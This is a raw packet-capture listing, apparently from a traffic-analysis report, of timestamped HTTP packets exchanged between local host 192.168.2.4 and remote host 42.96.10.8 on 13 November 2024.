                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647458076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647474051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647489071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647500992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647533894 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647562981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647589922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647603035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647618055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647629023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647639990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647655010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647670031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647670031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647689104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647692919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647722960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647728920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647751093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647787094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647823095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647849083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647866011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647883892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647890091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647902966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647918940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647921085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647955894 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647973061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.647988081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648001909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648016930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648024082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648051023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648066998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648102999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648118973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648142099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648156881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648184061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648209095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648274899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648291111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648309946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648312092 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648327112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648349047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648411036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648426056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648442030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648449898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648478985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648483992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648495913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648513079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648534060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648574114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648613930 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648648024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648663044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648690939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648699045 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648705959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648721933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648741007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648818016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648833990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648849010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648855925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648885012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648900986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648916960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648933887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648950100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648953915 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648967028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.648987055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.649044991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.649060011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.649075985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.649085999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.649112940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.649123907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.649139881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.649153948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.649179935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.691884995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.691906929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.691924095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.691929102 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.691961050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.692233086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.692248106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.692262888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.692279100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.692290068 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.692295074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.692315102 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.692331076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.692365885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.692368984 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.692383051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.692424059 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.692473888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.692488909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.692503929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.692517996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.692527056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.692532063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.692548990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.692554951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.692563057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.692585945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.743052959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.746205091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.746225119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.746243000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.746278048 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762265921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762295961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762312889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762316942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762329102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762347937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762358904 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762362003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762392998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762401104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762425900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762440920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762444019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762476921 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762485027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762501001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762514114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762537956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762746096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762762070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762777090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762788057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762815952 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762828112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762887955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762903929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762923002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762953997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762970924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762988091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.762989044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763003111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763017893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763026953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763036013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763057947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763175011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763190031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763214111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763216019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763231993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763247013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763252974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763263941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763283014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763432980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763482094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763497114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763499022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763535023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763542891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763559103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763576031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763590097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763596058 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763607025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763628006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763645887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763664961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763680935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763684988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763716936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763786077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763801098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763818979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763839006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763847113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763861895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763875961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763895035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763901949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763919115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763930082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763936996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763953924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763964891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.763989925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764017105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764031887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764055967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764070988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764071941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764089108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764108896 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764205933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764220953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764235973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764254093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764280081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764292955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764308929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764353991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764389992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764408112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764424086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764441967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764446974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764488935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764525890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764540911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764556885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764573097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764575958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764607906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764642954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764658928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764673948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764688015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764694929 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764703989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764724016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764825106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764841080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764854908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764875889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.764900923 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.807486057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.807502031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.807518005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.807540894 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.807600021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.807614088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.807629108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.807641029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.807665110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.807682991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.807698965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.807713985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.807734013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.807766914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.807805061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.807826996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.807841063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.807868004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.807873964 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.807883978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.807899952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.807921886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.852442980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.854108095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.854130030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.854146957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.854163885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.861561060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.861592054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.861604929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.861605883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.861623049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.863338947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.877880096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.877896070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.877912045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.877971888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.877971888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878166914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878201008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878217936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878245115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878262997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878266096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878279924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878294945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878307104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878324032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878334999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878353119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878367901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878384113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878391981 CET4973380192.168.2.442.96.10.8
